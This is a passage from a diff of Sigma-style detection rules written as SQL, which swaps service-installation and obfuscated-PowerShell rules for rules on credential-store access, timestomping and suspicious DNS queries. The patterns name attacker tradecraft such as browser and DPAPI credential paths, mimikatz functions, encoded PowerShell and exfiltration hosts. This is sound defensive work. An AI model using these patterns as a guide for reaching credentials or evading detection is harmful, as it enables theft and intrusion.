dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "status": "experimental", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to 
remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' 
ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "Tap Driver Installation", - "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "status": "test", - 
"description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Suspicious Access To Browser Credential Files", + "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Legitimate software installed on partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR (FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\') OR (FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\')) AND NOT ((NewProcessName = 'System' AND ParentProcessName = 'Idle') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' 
OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "win_system_tap_driver_installation.yml" + "filename": "file_access_win_browser_credential_stealing.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Suspicious Access To Windows DPAPI Master Keys", + "id": "46612ae6-86be-4802-bc07-39b59feb1309", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_access_win_dpapi_master_key_access.yml" }, { - "title": "Mesh Agent Service Installation", - "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "title": "Credential Manager Access", + "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "status": "experimental", - "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::cred\" function\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Legitimate use of the tool" + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_service_install_mesh_agent.yml" + "filename": "file_access_win_credential_manager_stealing.yml" }, { - "title": "Exploit SamAccountName Spoofing with Kerberos", - "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "status": "test", - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "author": "frack113", + "title": "Suspicious Access To Windows Credential History File", + "id": 
"7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1558.003" + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38')) OR (Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))))" + "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + "filename": "file_access_win_susp_cred_hist_access.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "AppX Package Installation Attempts Via AppInstaller", + "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "status": "test", + "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. 
It attempts to load/install a package from the referenced URL", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "dns_query_win_lolbin_appinstaller.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE 
'%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - 
NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' 
ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. 
domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "Service Installation in Suspicious Folder", - "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", "status": "experimental", - "description": "Detects service installation in suspicious folder appdata", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" ], - "filename": 
"win_system_susp_service_installation_folder.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "PAExec Service Installation", - "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", - "status": "experimental", - "description": "Detects PAExec service installation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious DNS Query for IP Lookup Service APIs", + "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "status": "test", + "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", + "author": "Brandon George (blog post), Thomas Patzke (rule)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.reconnaissance", + "attack.t1590" ], "falsepositives": [ - "Unknown" + "Legitimate usage of IP lookup services such as ipify API" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((QueryName LIKE '%api.2ip.ua%' ESCAPE '\\' OR QueryName LIKE '%api.ipify.org%' ESCAPE '\\' OR QueryName LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%canireachthe.net%' ESCAPE '\\' OR QueryName LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR QueryName LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR QueryName LIKE '%curlmyip.com%' ESCAPE '\\' OR QueryName LIKE '%edns.ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%eth0.me%' ESCAPE '\\' OR QueryName LIKE '%freegeoip.app%' ESCAPE '\\' OR QueryName LIKE '%icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ident.me%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.io%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.me%' ESCAPE '\\' OR QueryName LIKE '%ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%ip.anysrc.net%' ESCAPE '\\' OR QueryName LIKE '%ip.tyk.nu%' ESCAPE '\\' OR QueryName LIKE '%ipaddressworld.com%' 
ESCAPE '\\' OR QueryName LIKE '%ipecho.net%' ESCAPE '\\' OR QueryName LIKE '%ipinfo.io%' ESCAPE '\\' OR QueryName LIKE '%ipof.in%' ESCAPE '\\' OR QueryName LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%ipwho.is%' ESCAPE '\\' OR QueryName LIKE '%l2.io%' ESCAPE '\\' OR QueryName LIKE '%myexternalip.com%' ESCAPE '\\' OR QueryName LIKE '%wgetip.com%' ESCAPE '\\' OR QueryName LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR QueryName LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR 
(NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_service_install_paexec.yml" + "filename": "dns_query_win_susp_ipify.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious LDAP Domain Access", + "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "status": "experimental", + "description": "Detect suspicious LDAP request from non-Windows application", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" ], - "filename": 
